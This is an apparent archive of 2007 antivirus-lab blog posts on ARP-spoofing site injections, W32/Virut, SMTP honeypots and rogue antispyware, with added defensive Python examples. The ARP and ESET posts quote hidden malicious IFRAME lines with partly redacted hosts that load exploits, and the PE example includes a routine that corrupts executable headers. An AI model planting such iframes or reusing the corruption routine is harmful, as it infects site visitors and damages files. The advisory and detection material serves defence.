Archive for October, 2007

User Education

What is antivirus protection worth when users try every trick they know to open the Loveletter.jpg.vbs "picture" (a VBScript, not an image; the double extension is the whole trick)? Why do they double-click on executable files? Whether it's Kournikova, Labor Day greeting cards, or just an "undeliverable message" with the "details" attached, many users don't care.

Home users risk their privacy and may lose the ownership of their machines, but they can’t resist the temptation.

Corporate users are sometimes even less careful, as it’s not their machine and if it’s broken, it’s not their problem. The IT department will fix it.

“If the company sends the mails to my machine, they know what they are doing. Why shouldn’t I click on those mails?” I heard that once from a corporate user–it scared me, because it was that user who was causing an internal outbreak.

While that user enjoyed the weekend, the IT guys tried to regain control of their network. About 15 employees of that company were working the whole weekend, plus external consultants.

That was one of the most expensive double-clicks that company ever had.

Is it that hard to think twice?
Don’t users know enough about risks?
Don’t they know about the consequences of an outbreak?

What have we learned from history?

C’mon, it’s not that hard. :lol:

Next time you receive an unexpected (mail)-delivery, think twice before you let it pass your last line of defense.

Think Your Home Computer Is Safe? Think Again

In 2004 and 2005, the AOL/NCSA surveys revealed a significant gap between security perceptions versus reality. Many consumers thought they were correctly protected against malware, when in fact, they were not.

These days, McAfee and its competitors offer automatic updates, but the problem is still very topical. The latest McAfee/NCSA survey shows the scope of the issue, and unfortunately the improvement over the last two years has been poor. I would go so far as to say the situation is perhaps worse: minimum security now means updating daily rather than weekly, and more malware is written today than ever before.

                                                          2004        2005        2007
Respondents who claim to have up-to-date AV protection    71% (note)  68% (note)  92%
Respondents who either have no anti-virus protection or
have not updated it within the past week                  67%         56%         49%

Note: for 2004 and 2005 the first row is the percentage of respondents saying they update their anti-virus on a weekly/daily basis.

The need to educate consumers is greater than ever, with nearly nine in ten Americans using their computer online for banking, stock trading or reviewing personal medical information.

The McAfee/NCSA Online Safety Study is available here. It starts with “Think Your Home Computer Is Safe? Think Again” and contains very interesting data regarding Americans’ opinions of their computer security vs the reality.

Bad month for malware authors

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don't mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and the three men who were recently fined by the FTC for surreptitiously distributing adware will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

ARP Spoofing: Is Your Web Hosting Service Protected ?

Over the last couple of months we have discussed several times how public and commercial web hosting services can be abused to host malware and exploits and to send spam.

This week was the “golden week” holiday season in China, and hackers decided that this is a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced in their blog on Tuesday, October 2nd, that malicious IFRAMEs were inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and method of intrusion.

According to C.I.S.R.T.’s own investigations, it was an ARP poisoning attack originating from the web service provider’s network. And you guessed it, the web service engineers are away for the week.

ARP poisoning is a man-in-the-middle attack: by answering ARP queries with forged replies, a machine on the same network segment inserts itself between the gateway and the web servers and can then modify traffic passing through it, in this case injecting code into the HTML as it is served. Because the injection happens in transit, the files on the web server's disk are unchanged, which is one reason such compromises are hard to spot from the server itself. On the C.I.S.R.T. website, the following malicious IFRAME links were inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities being targeted by the obfuscated exploits inserted into the web pages: Exploit-MS06-014 and Exploit-BaoFeng.a. Both had been patched by their respective vendors; the latter affected a popular Chinese media player. A quick check of several other virtual hosts on the same provider turned up at least one more web site injected with malicious links:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>

ARP poisoning is old school, but it can still be deadly in a virtual domain hosting environment, because one poisoned gateway lets an attacker infect every website behind it, as seen in some instances of the HTool-MPack attack, which affected thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes in his blog how web page code injection is achievable via ARP spoofing. Trojan tool kits such as NetSniff have this functionality built in, making it easy for attackers to perform. On the other hand, it is a "noisy" technique: the forged replies have to be repeated to keep the victims' ARP caches poisoned, so spoofed ARP packets can easily be detected on the wire.
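As an added example (not part of the original post, and not McAfee's, C.I.S.R.T.'s or NetSniff's code), here is the kind of detector that catches that noise. It parses raw Ethernet/ARP frames the way a sniffer on the hosting segment would see them and alerts on the two symptoms a poisoner produces: an IP address that starts answering from a different MAC, and a reply for the gateway that nobody asked for. The gateway address, the MACs and the replayed frames are all constructed for the example.

```python
"""ARP-cache poisoning detector for raw Ethernet/ARP frames.

Added example: not code from McAfee, C.I.S.R.T. or NetSniff. It parses frames
as a sniffer on the hosting segment would see them and flags the two symptoms
a poisoner produces: an IP address that starts answering from a different MAC,
and unsolicited replies for the gateway. All addresses and frames below are
constructed for the example."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac(text):
    return bytes.fromhex(text.replace(":", ""))


def _ip(text):
    return bytes(int(x) for x in text.split("."))


def _fmt_mac(raw):
    return ":".join(f"{x:02x}" for x in raw)


def _fmt_ip(raw):
    return ".".join(str(x) for x in raw)


def build_arp(src_mac, dst_mac, op, sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet II frame carrying an IPv4-over-Ethernet ARP packet (42 bytes)."""
    eth = _mac(dst_mac) + _mac(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)       # htype, ptype, hlen, plen, op
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    b = frame[22:42]
    return op, _fmt_mac(b[0:6]), _fmt_ip(b[6:10]), _fmt_mac(b[10:16]), _fmt_ip(b[16:20])


class ArpWatch:
    """Tracks IP->MAC bindings seen on the wire and records anomalies."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.table = {}          # ip -> first MAC it was seen with
        self.pending = set()     # ips we saw a request for, so a reply is expected
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, smac, sip, _tmac, tip = parsed
        if op == ARP_REQUEST:
            self.pending.add(tip)
        elif op == ARP_REPLY:
            # A reply nobody asked for that claims the gateway address is the
            # classic poisoning pattern (the poisoner sends the mirror image to
            # the gateway so it can see both directions of the traffic).
            if sip == self.gateway_ip and sip not in self.pending:
                self.alerts.append(f"unsolicited reply: {sip} is-at {smac}")
            self.pending.discard(sip)
        self._learn(sip, smac)

    def _learn(self, ip, mac):
        known = self.table.setdefault(ip, mac)
        if known != mac:
            self.alerts.append(f"{ip} changed from {known} to {mac}")


def demo():
    """Replay a constructed capture: one honest exchange, then a poisoner's reply."""
    gw_ip, gw_mac = "10.0.0.1", "00:11:22:33:44:01"
    web_ip, web_mac = "10.0.0.10", "00:11:22:33:44:0a"
    evil_mac = "de:ad:be:ef:00:01"
    capture = [
        build_arp(web_mac, BROADCAST, ARP_REQUEST, web_mac, web_ip, "00:00:00:00:00:00", gw_ip),
        build_arp(gw_mac, web_mac, ARP_REPLY, gw_mac, gw_ip, web_mac, web_ip),
        build_arp(evil_mac, web_mac, ARP_REPLY, evil_mac, gw_ip, web_mac, web_ip),
    ]
    watch = ArpWatch(gw_ip)
    for frame in capture:
        watch.feed(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in demo():
        print("ALERT:", alert)
```

In a real deployment the frames come from a capture library rather than from `build_arp`; a legitimate NIC replacement or a failover gateway will also trigger the "changed" alert, so treat it as a lead to check, not proof. The preventive counterparts are static ARP entries for the gateway on each virtual host and dynamic ARP inspection or port security on the switch, which is what to ask the hosting provider about.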

If you had planned to review your website’s security and discuss it with your service provider, now might be good time.


At least we don’t have caterpillars!

Thought I’d pass along some Friday giggles to take you all into the weekend.

In a former job-incarnation I was a florist, which has left me with certain plant geek tendencies. It's very rare for my security-geek and plant-geek worlds to cross, but today they did. Apparently certain plants which grow by underground runners (or "stolons") use those connections as a sort of Instant Messaging platform.

On the plus side, if one plant is attacked by caterpillars, the rest will fortify themselves against attack. On the minus side, if one plant gets infected with a virus, so will the rest of them.

Clearly clovers lack the resources for a proper layered defense strategy.

Maybe they're not up to date on their software patches or security updates. …Or maybe they've been falling for clover social engineering - some mischievous clover sending nasty links by IM.

W32/Virut: Evolution gone wrong

In this age of botnets, rootkits, spyware and other bleeding edge security threats, file infectors are frequently thought of as a dead threat. But over the past year or so, we have seen a resurgence in classic file infecting viruses. Parasitic threats such as W32/Bacalid, W32/Detnat and W32/Polip have enjoyed a relatively high degree of success in the wild causing widespread damage to computer systems.

An upcoming new kid on the block is W32/Virut, a polymorphic entry-point obscuring virus with IRC bot functionality. Once a machine is infected, it hooks ZwCreateFile, ZwCreateProcess, ZwCreateProcessEx and ZwOpenFile in ntdll.dll in all running processes, so that any .EXE or .SCR file a process opens or launches becomes an infection candidate. It then "phones home" to a remote IRC command and control server, from which it can be instructed to download other malware or to take part in DDoS attacks.

W32/Virut comes with its share of buggy code, and as a result it may misinfect or reinfect a significant proportion of executable files, leaving them corrupted beyond repair. Some variants make the trivial mistake of not checking PE section boundaries while infecting, which causes infected executables to crash when run. The virus also sometimes hijacks its own function calls, which leads to an infinite loop. No one ever said viruses had the best programming ;-)
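The section-boundary mistake is easy to make concrete. The following added example (not code from the Virut analysis or from McAfee) performs the two bounds checks a file infector, or a repair tool deciding whether a file is still salvageable, has to make against the PE section table: every section's raw data must lie inside the file, and the entry point must resolve to some section. It synthesises a minimal PE32 image in memory (a header skeleton, not a runnable executable) and then reproduces the bug described above: the last section's sizes are enlarged and the entry point moved into the "new" space, but the bytes are never appended, so the header points past the end of the file.

```python
"""PE section-table and entry-point bounds checks.

Added example, not code from the W32/Virut analysis. It performs the checks a
file infector (or a repair tool) must make before trusting a section table:
every section's raw data must lie inside the file, and the entry point must
resolve to some section. A minimal PE32 image is synthesised in memory to
exercise the checks; it is not a real executable and will not run."""
import struct

SECTION_HDR = "<8sIIIIIIHHI"                     # IMAGE_SECTION_HEADER
SECTION_HDR_SIZE = struct.calcsize(SECTION_HDR)  # 40
FILE_ALIGN = 0x200


def _align(n):
    return (n + FILE_ALIGN - 1) // FILE_ALIGN * FILE_ALIGN


def parse_sections(data):
    """Return (entry_point_rva, [(name, vsize, va, rawsize, rawptr), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                   # optional header
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    table = opt + opt_size                                # first section header
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HDR, data, table + i * SECTION_HDR_SIZE)
        sections.append((f[0].rstrip(b"\0").decode(), f[1], f[2], f[3], f[4]))
    return entry, sections


def check_pe(data):
    """Return a list of layout problems; empty means the file is self-consistent."""
    problems = []
    entry, sections = parse_sections(data)
    for name, vsize, va, rawsize, rawptr in sections:
        if rawptr + rawsize > len(data):
            problems.append(f"{name}: raw data 0x{rawptr:x}+0x{rawsize:x} runs past EOF 0x{len(data):x}")
    if not any(va <= entry < va + max(vsize, rawsize) for _, vsize, va, rawsize, _ in sections):
        problems.append(f"entry point 0x{entry:x} is outside every section")
    return problems


def build_pe(sections, entry_rva):
    """Synthesise a minimal PE32 image from (name, virtual_address, body) tuples."""
    e_lfanew, opt_size = 0x40, 0xE0                       # standard PE32 optional header size
    raw = _align(e_lfanew + 24 + opt_size + len(sections) * SECTION_HDR_SIZE)
    table, bodies, raw_start = b"", b"", raw
    for name, va, body in sections:
        rawsize = _align(len(body))
        table += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), len(body), va,
                             rawsize, raw, 0, 0, 0, 0, 0x60000020)   # code|exec|read
        bodies += body.ljust(rawsize, b"\0")
        raw += rawsize
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    return (dos + coff + opt + table).ljust(raw_start, b"\0") + bodies


def misinfect(data, extra=0x400):
    """Mimic the bug described: grow the last section's sizes and point the entry
    into the 'new' space, but never append the bytes to the file."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    last = e_lfanew + 24 + opt_size + (nsections - 1) * SECTION_HDR_SIZE
    buf = bytearray(data)
    vsize, va, rawsize = struct.unpack_from("<III", buf, last + 8)   # VirtualSize, VA, SizeOfRawData
    struct.pack_into("<III", buf, last + 8, vsize + extra, va, rawsize + extra)
    struct.pack_into("<I", buf, e_lfanew + 24 + 16, va + rawsize)   # new AddressOfEntryPoint
    return bytes(buf)


def clean_sample():
    """A two-section skeleton (constructed for the example)."""
    return build_pe([(".text", 0x1000, b"\xC3" * 64), (".data", 0x2000, b"\0" * 16)], 0x1010)


if __name__ == "__main__":
    print("clean:", check_pe(clean_sample()) or "ok")
    print("misinfected:", check_pe(misinfect(clean_sample())))
```

On a real file the same `check_pe` run against an executable that crashes after an infection tells you quickly whether the loader is rejecting a header that points outside the file (repairable only from a backup) or whether the damage is inside the code itself.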

The creator of W32/Virut appears to have a fancy for the works of Friedrich Nietzsche, the nineteenth-century German philosopher. Embedded in the virus body is an excerpt from a poem by Nietzsche.

O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It’s late!

Virus code more typically contains personal taunts directed at the antivirus community or flames against rival malware authors. But quoting Friedrich Nietzsche - that's deep! (Credit to Naveen Gooty for the analysis, though Dave Marcus still doubts the translation used in the virus code!!)

Spread the word, not the virus!

Organizations have traditionally blocked outbound Simple Mail Transfer Protocol (SMTP) traffic on port 25 originating from the local area network (LAN) and virtual private network (VPN) segments. This is done to prevent any internal machine infected with a mass-mailer from spamming the outside world. Email can be traced back to its origin via the IP address information in the mail headers, and no organization wants to be held responsible for spreading malware onto the internet; it would be a public relations nightmare.

By blocking port 25 at the firewall, an organization prevents a mass-mailer from spreading. However, by blindly dropping outgoing SMTP traffic, it also throws away valuable real-time information: which internal machines are infected, and what data is leaking out through threats that use port 25.

In this month’s Oct 2007 edition of Virus Bulletin, we proposed the need for an in-house SMTP honeypot. A copy of this article titled “The need for an in-house SMTP Honeypot” can be downloaded from our McAfee Avert Labs Technical White Papers page.

Simple Mail Transfer Protocol honeypots have traditionally been used to masquerade as open relays in order to frustrate spammers and harvest spam. With spammer tactics having changed over the years, it is high time we revisited traditional countermeasures and improved upon them.
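The in-house variant is a sink rather than a relay: it accepts whatever an internal host tries to send, records who sent what to whom, and delivers nothing. The following is an added example of such a sink (not code from the Virus Bulletin article or a McAfee tool); the session logic is a pure state machine so the asyncio server at the bottom and a scripted run share it. The host name, the listening port, the addresses and the sample mass-mailer transcript are all made up for the example.

```python
"""In-house SMTP honeypot: records what an internal host tries to send on port
25 and never relays it. Added example (not code from the Virus Bulletin article
or a McAfee tool); host names, addresses and the sample transcript are made up.
The session logic is a pure state machine so the asyncio server at the bottom
and a scripted run share it."""
import asyncio
import time


class SmtpSink:
    """Enough SMTP (HELO/EHLO, MAIL, RCPT, DATA, RSET, QUIT) to be handed a whole message."""

    def __init__(self, peer, on_message=None, hostname="smtp-sink.internal"):
        self.peer = peer                # client IP: this is what identifies the infected host
        self.on_message = on_message    # called with each captured message
        self.hostname = hostname
        self.closed = self.in_data = False
        self._reset()

    def _reset(self):
        self.sender, self.recipients, self.body_lines = None, [], []

    def greeting(self):
        return [f"220 {self.hostname} ESMTP ready"]

    def feed(self, line):
        """Process one CRLF-stripped client line; return the server's reply lines."""
        if self.in_data:
            if line != ".":
                # undo dot-stuffing (RFC 5321 4.5.2): a leading ".." means a literal "."
                self.body_lines.append(line[1:] if line.startswith("..") else line)
                return []
            self.in_data = False
            msg = {"time": time.time(), "peer": self.peer, "from": self.sender,
                   "to": list(self.recipients), "data": "\n".join(self.body_lines)}
            if self.on_message:
                self.on_message(msg)
            self._reset()
            return ["250 OK: recorded, not relayed"]
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return [f"250 {self.hostname}"]
        if verb == "MAIL":                        # MAIL FROM:<addr>
            self.sender = arg.partition(":")[2].strip().strip("<>")
            return ["250 OK"]
        if verb == "RCPT":                        # RCPT TO:<addr>
            if self.sender is None:
                return ["503 need MAIL first"]
            self.recipients.append(arg.partition(":")[2].strip().strip("<>"))
            return ["250 OK"]
        if verb == "DATA":
            if not self.recipients:
                return ["503 need RCPT first"]
            self.in_data = True
            return ["354 end data with <CR><LF>.<CR><LF>"]
        if verb == "RSET":
            self._reset()
            return ["250 OK"]
        if verb == "QUIT":
            self.closed = True
            return ["221 bye"]
        return ["502 command not implemented"]


def run_script(peer, client_lines):
    """Drive one session from a list of client lines; return (replies, captured messages)."""
    captured = []
    session = SmtpSink(peer, on_message=captured.append)
    replies = list(session.greeting())
    for line in client_lines:
        replies.extend(session.feed(line))
    return replies, captured


# Constructed transcript of the kind a mass-mailer produces (made up for this example).
SAMPLE_CLIENT = ["EHLO workstation-17", "MAIL FROM:<greetings@example.com>",
                 "RCPT TO:<alice@example.net>", "RCPT TO:<bob@example.org>", "DATA",
                 "Subject: Labor Day card", "", "..see attachment", ".", "QUIT"]


def log_message(msg):
    stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(msg["time"]))
    print(f"{stamp} src={msg['peer']} from={msg['from']} to={','.join(msg['to'])} "
          f"bytes={len(msg['data'])}")


async def handle(reader, writer):
    session = SmtpSink(writer.get_extra_info("peername")[0], on_message=log_message)
    writer.write("".join(r + "\r\n" for r in session.greeting()).encode())
    while not session.closed:
        raw = await reader.readline()
        if not raw:
            break
        replies = session.feed(raw.decode(errors="replace").rstrip("\r\n"))
        writer.write("".join(r + "\r\n" for r in replies).encode())
        await writer.drain()
    writer.close()


if __name__ == "__main__":   # redirect internal port-25 traffic to this port at the firewall
    async def serve():
        server = await asyncio.start_server(handle, "0.0.0.0", 2525)
        async with server:
            await server.serve_forever()
    asyncio.run(serve())
```

The deployment detail that makes this useful is the firewall rule: instead of dropping internal port-25 traffic, DNAT it to the sink (with the real mail relay exempted), so the log line's `src=` field names the infected workstation within seconds of its first send attempt rather than after the help-desk call.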

Nod to more ARP mayhem ?

Following our blog about the significance of web hosting security versus ARP spoofing, our friends at security vendor ESET made an official statement on October 9th about an ARP attack against their official China website earlier this week. As in the other ARP attacks, the following malicious IFRAME link was found inserted into their web pages:

<iframe src=http://fs18.net/down{blocked}/yy.htm width=20 height=0 frameborder=0></iframe>

The “yy.htm” web page, detected generically as Exploit-MS06-014, can download a variety of malware including:

  • vip1.htm (Exploit-BaoFeng.a)
  • 0.exe (PWS-QQGame)
  • kvmxeis.exe (PWS-OnlineGames.a)
  • ii.exe (PWS-QQPass.dll)
  • SysWin78.Jmp (PWS-QQGame)
  • WinSys88.Sys (PWS-QQGame)
  • System6.ins (PWS-QQPass.dll)

In 2007, hijacking of popular websites has become one of the many effective malware propagation methods in China. From W32/Fujacks -style web page infection to ARP spoofing, we have seen many important websites reportedly hijacked to host exploits and malware since the end of 2006.

With relatively good success, this means of malware infection and exploitation has also evolved rapidly from common Microsoft vulnerabilities (Exploit-MS06-014, Exploit-MS07-004, etc.) to application-level vulnerabilities in Yahoo Messenger, the Chinese media player Baofeng, and PPStream.

Network intrusion prevention, web server policies and patch management come to mind as the minimum defenses needed, and they should be reviewed by companies using or offering web services as well as by ISPs.

AntiSpyStorm: Fake Microsoft AntiSpyware Center pushing Adware !

Adware and spyware have long been the bane of computer users, probably even more than viruses. Most of the time malware authors employ the age-old art of social engineering to trick less tech-savvy computer users into installing adware and spyware, and over time they have come up with ever more innovative methods to convince a user to install these so-called AntiSpyware programs.

This time, it’s a fake Microsoft AntiSpyware website that is promoting the rogue AntiSpyware application, AntiSpyStorm. Avert had earlier blogged about rogue AntiSpyware applications like SystemDoctor and we have probably classified several hundreds of them, if not thousands. This threat appears to be a successor to the trojan FakeAlert-D.

AntiSpyStorm

This fake Microsoft AntiSpyware Center page purports to be an "Online Security Scanner" that scans the system for viruses and spyware. After the fake scan, the user is presented with a bogus list of Trojans and then prompted to download and install an ActiveX control to remove them.

The infection starts when the unsuspecting user installs the alleged ActiveX control. The trojan hijacks the Internet Explorer home page and shows fake alerts and exaggerated security threats, pushing the user to install a trial version of the AntiSpyStorm product.

After installation the product offers a free system scan for threats. The report is exaggerated and lists false errors as actual threats. Once the user is scared into believing these threats are real, AntiSpyStorm offers the full version and tricks the victim into entering credit card details.

I have put together a short video which shows how an unsuspecting user could get infected.

The rogue anti-spyware is detected with the current DATs as Adware-AntiSpyStorm and the fake ActiveX control as FakeAlert-T.

Two dead spammers?

It seems that today someone invented a new way of fighting spam. The idea is simple: scare spammers to death by circulating a hoax that one of their ilk has just been murdered! It would not take long for people to conclude that such a sad fate might be related to the professional activities of the deceased. The following blog post appeared today on one of the anonymous sites and immediately got wide attention:

Image of loonov.com

To reinforce the story they even included a reference to a real story back from 2005 when the most prolific Russian spammer—Vardan Kushnir—was killed in Moscow. There is a big “but” here though. The widespread belief that the murder of Vardan Kushnir in July 2005 was related to spam distribution collapsed after the real killers were detained one month later. It’s ironic, though perhaps typical of how media works, that unfounded speculations received much wider publicity than the facts that became available once the murder case was closed.

As much as we at McAfee Avert Labs would like to reduce the level of spam, we just have to conclude that spammers can still sleep well at night. :-)